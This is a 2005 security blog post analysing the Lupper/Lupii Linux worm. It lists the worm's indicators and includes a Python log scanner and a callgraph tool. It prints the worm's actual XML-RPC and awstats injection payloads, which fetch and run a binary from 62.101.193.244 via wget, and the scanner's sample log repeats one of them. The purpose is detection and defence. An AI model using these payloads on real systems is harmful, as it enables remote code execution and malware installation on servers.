
New Worm: Lupper/Lupii

A new Linux worm is on the loose, this one targeting a couple of different web bugs. Here are some writeups:

The worm operates by scanning for systems with TCP port 80 open, then launching a series of attacks by scanning for common URLs, some of which are below:

  • /xmlrpc.php
  • /xmlrpc/xmlrpc.php
  • /xmlsrv/xmlrpc.php
  • /blog/xmlrpc.php
  • /drupal/xmlrpc.php
  • /community/xmlrpc.php
  • /blogs/xmlrpc.php
  • /blogs/xmlsrv/xmlrpc.php
  • /blog/xmlsrv/xmlrpc.php
  • /blogtest/xmlsrv/xmlrpc.php
  • /b2/xmlsrv/xmlrpc.php
  • /b2evo/xmlsrv/xmlrpc.php
  • /wordpress/xmlrpc.php
  • /phpgroupware/xmlrpc.php

Part of the PHP XML RPC attack involves a POST method to launch the binary, which looks something like this:

<methodcall><methodname></methodname></methodcall><p>test.method</p><params><param /><value><name></name></value></params><p>',''));echo '_begin_';echo `cd /tmp;wget 62.101.193.244/lupii;chmod +x lupii;./lupii 62.101.193.244 `;echo '_end_';exit;/*

In the case of the awstats hole, the attack takes this form (you can do the printf() style formatting yourself, and reassemble the lines as needed):

GET %sawstats.pl?configdir=|echo;echo%%20YYY;cd%%20%%2ftmp%%3bwget%%2062%%2e101 %%2e193%%2e244%%2flupii%%3bchmod%%20%%2bx%%20lupii%%3b%%2e%%2flupii%%2062 %%2e101%%2e193%%2e244;echo%%20YYY;echo|

Basically, both attacks abuse unescaped input that reaches a shell to fetch the file and then launch it. The binary itself has many similarities to the Linux Slapper worm from 2002, joining a P2P network for commands (in theory more resilient than a centrally located botnet channel). For an excellent writeup of the Slapper worm, read "Attack Trends: An Analysis of the Slapper Worm" by Ivan Arce and Elias Levy, published in an early volume of the IEEE magazine Security & Privacy.

Hallmarks of this worm are as follows:

  • logfile marks for the XML RPC PHP scripts with the arguments similar to the ones shown above
  • logfile marks for the awstats holes similar to those shown above
  • Linux boxes listening on UDP ports 7111 and 7222.
  • traffic to and from UDP ports 7111 and 7222 (as dest ports, using the normal ephemeral source port range)
  • traffic to and from the IP address 62.101.193.244
  • infected boxes will have a process named "lupii" and a file, "/tmp/lupii", around. It doesn't appear to use any kernel rootkits to hide the process.
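As an added example (not code from the original post), here is a small Python scanner for an Apache-style access log that looks for the hallmarks listed above: a client probing several of the xmlrpc.php paths, an awstats.pl request whose configdir value starts with a shell pipe, and any request carrying the worm's download host or filename. The log lines are constructed, and the threshold of three distinct xmlrpc.php paths is an assumption.

```python
import re
from urllib.parse import unquote
# Indicators taken from the Lupii description above; the log lines below are constructed.
LUPII_DOWNLOAD_HOST = "62.101.193.244"
# NCSA/Apache common log format: client ident user [date] "METHOD URL PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)(?: \S+)?" \d{3} \S+')

SAMPLE_LOG = [  # constructed, not captured data
    '10.0.0.7 - - [07/Nov/2005:10:00:01 +0000] "POST /xmlrpc.php HTTP/1.1" 404 291',
    '10.0.0.7 - - [07/Nov/2005:10:00:01 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 404 291',
    '10.0.0.7 - - [07/Nov/2005:10:00:02 +0000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 291',
    '10.0.0.7 - - [07/Nov/2005:10:00:03 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;'
    'cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062'
    '%2e101%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 200 512',
    '192.0.2.9 - - [07/Nov/2005:10:05:00 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 1043',
    '192.0.2.9 - - [07/Nov/2005:10:06:00 +0000] "GET /cgi-bin/awstats.pl?config=x&configdir=/etc/awstats HTTP/1.1" 200 8820',
]

def request_tags(url):
    """Per-request hallmarks: a configdir value starting with a shell pipe, or the worm's fetch string."""
    path, _, query = url.partition("?")
    tags = set()
    if path.endswith("awstats.pl"):
        params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
        if unquote(params.get("configdir", "")).lstrip().startswith("|"):
            tags.add("awstats-configdir-injection")
    decoded = unquote(url)  # %2e-style encoding hides the IP and filename in the raw line
    if LUPII_DOWNLOAD_HOST in decoded or "lupii" in decoded:
        tags.add("lupii-fetch-string")
    return tags

def scan(lines, probe_threshold=3):
    """Return {client: set of hallmarks}; POSTs to >= probe_threshold distinct */xmlrpc.php paths count as a scan."""
    hits, xmlrpc_paths = {}, {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, url = m.groups()
        path = url.partition("?")[0]
        if method == "POST" and path.endswith("/xmlrpc.php"):
            xmlrpc_paths.setdefault(client, set()).add(path)
        tags = request_tags(url)
        if tags:
            hits.setdefault(client, set()).update(tags)
    for client, paths in xmlrpc_paths.items():
        if len(paths) >= probe_threshold:
            hits.setdefault(client, set()).add("xmlrpc-path-scan")
    return hits
```

A single POST to xmlrpc.php is normal blog traffic, so only the burst across many of the probed paths is flagged; the configdir check decodes the value first so a percent-encoded pipe is caught too.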

I've had a chance (via JW, who sent me the captured binaries) to analyze the executables. There are at least two in circulation, one targeting only PHP XML RPC sites and the associated bugs, and one targeting that set of holes and the well known awstats bugs. Aside from that, they're nearly identical. I generated some static callgraphs using Python, Graphviz, and objdump, and have them below.


Figure 1: Callgraph generated using "objdump" on a Linux system from the first of the two Lupii binaries.


Figure 2: Callgraph generated using "objdump" on a Linux system from the second of the two Lupii binaries, the one that attacks both PHP XML RPC and awstats bugs.
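The post does not include the callgraph script, so here is an added Python sketch of the approach it describes: walk an `objdump -d` listing, record which function each `call` lands in, and emit the edges as Graphviz dot. The listing is a constructed excerpt with made-up symbol names, not disassembly of the Lupii binaries.

```python
import re

# Constructed excerpt in "objdump -d" style (invented symbols; not the Lupii binaries).
OBJDUMP_SAMPLE = """
08048400 <main>:
 8048400:   55                      push   %ebp
 8048405:   e8 16 00 00 00          call   8048420 <scan_hosts>
 804840a:   e8 31 00 00 00          call   8048440 <join_p2p>
08048420 <scan_hosts>:
 8048425:   e8 26 00 00 00          call   8048450 <send_xmlrpc>
 804842a:   e8 d1 fb ff ff          call   8048000 <connect@plt>
08048440 <join_p2p>:
 8048445:   e8 b6 fb ff ff          call   8048000 <connect@plt>
08048450 <send_xmlrpc>:
 8048455:   e8 a6 fb ff ff          call   8048000 <connect@plt>
"""

FUNC_RE = re.compile(r'^[0-9a-f]+ <([^>]+)>:$')        # "08048400 <main>:" starts a function
CALL_RE = re.compile(r'\bcall\s+[0-9a-f]+ <([^>+]+)')  # direct call with a resolved symbol

def call_edges(listing):
    """Return the set of (caller, callee) pairs found in an objdump -d listing."""
    edges, current = set(), None
    for line in listing.splitlines():
        m = FUNC_RE.match(line)
        if m:
            current = m.group(1)  # every following call belongs to this function
            continue
        m = CALL_RE.search(line)
        if m and current:
            edges.add((current, m.group(1).split("@")[0]))  # strip the @plt suffix
    return edges

def to_dot(edges):
    """Render the edges as a Graphviz digraph, ready for `dot -Tpng`."""
    body = "\n".join(f'  "{a}" -> "{b}";' for a, b in sorted(edges))
    return "digraph callgraph {\n" + body + "\n}"

if __name__ == "__main__":
    print(to_dot(call_edges(OBJDUMP_SAMPLE)))
```

Only direct calls with a symbol are captured; indirect calls through registers, which a stripped binary forces you to resolve by hand, produce no edge.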

More info on the bugs abused:

Since not many large enterprises are running the vulnerable applications officially, I would expect more problems with this malware from unofficial sites set up within (or outside of) an organization, or from hosting sites and/or broadband sites. In my looking around, I don't see this as a widespread problem at this time. An open question I have is about how the request is made (I don't have the time to fully analyze this code right now). It seems to me that if it's using IP based "Host:" parameters in the request, it won't get virtual hosts that are using this vulnerable code. This may have a huge effect in slowing down this malware. A better option would have been to spread using named hosts found through a search engine.

November 7, 2005 in new worms

Comments

One thing to note that doesn't appear in the Symantec (at least) Incredibly Grotesque and Horrible Linux Worm Warning is that distribution of the worm's executable is from a central point, like some previous Linux worm(s) (lpdw0rm for example).

I've only gotten 2 groups of hits from this worm on my basement server (static IP address, though). Each group of hits had a different IP address for downloading the worm's executable. Both IP addresses sent by worms to my basement server were unavailable, suggesting that *someone* is aware of the central point distribution, and actively works to shut them down.

Posted by: Bruce Ediger | Nov 9, 2005 1:48:10 PM

Found a few attempts for the awstats.pl attack on one of my coloc servers. Was unsuccessful, but it did bring me to your blog and incidentally earned you a bookmark. Thanks for the info.

Posted by: Jon Larabee | Nov 14, 2005 12:42:48 PM

a blog about the worm problem, technology, detection, and defenses

Posted by: Miry | Aug 26, 2008 6:07:30 AM
